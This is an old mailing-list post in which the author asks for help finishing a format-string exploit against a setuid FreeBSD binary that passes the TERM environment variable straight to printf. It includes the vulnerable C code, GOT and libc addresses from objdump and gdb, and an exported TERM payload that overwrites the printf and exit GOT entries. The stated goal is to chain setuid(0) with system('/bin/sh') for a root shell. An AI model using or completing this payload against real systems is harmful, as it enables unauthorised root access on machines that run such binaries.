Hello, this is my first post. I hope its in the list.
I am posting to get some help in developing an exploit for such a condition.
The environment:
Freebsd machine, nonexec heap/stack. This is a suid binary, but is
not calling setuid().
main()
{
char * ptr ;
ptr = getenv("TERM");
if(ptr)
printf(ptr);
printf("\n");
exit(0);
}
objdump -R | grep printf
0804999c R_386_JUMP_SLOT printf
objdump -R | grep exit
080499b0 R_386_JUMP_SLOT exit
(gdb) p setuid
$1 = {<text variable, no debug info>} 0x280c1370 <setuid>
(gdb) p system
$2 = {<text variable, no debug info>} 0x28093a38 <system>
Using a format string it is possible to over-write the GOT entries for
printf() and exit().
I have been able to do so successfully. The problem is that it is not
enough to do just that, since it will become system("\n") or
system(0);
On freebsd, arguments are passed via pushing to the stack.
What I have been trying to do is this.
After rewriting the GOT entry for printf as that of setuid(), i want
to push a NULL byte onto the stack to call setuid(0);
The GOT entry for exit() has been replaced by that of system(). So
instead of pushing 0x0, i want to push a pointer to a "/bin/sh"
string.
Is this possible even? Or is there a better way of doing this.
to ovewrrite GOT:
export TERM=` printf \
"\x9c\x99\x04\x08\x9e\x99\x04\x08\xb0\x99\x04\x08\xb2\x99\x04\x08"`\
%.4960u%OFFSET\$hn%.5276u%OFFSET+1\$hn%.9628u%OFFSET+2\$hn%.60881u%OFFSET+3\$hn
where OFFSET = stackpop(?). Usually this is ~130 but it depends on how
your environmental variables are setup.
Im not sure what I would do next in order to change the values that
are being pushed. Could someone help me with this?
Received on Jan 30 2005
Intro
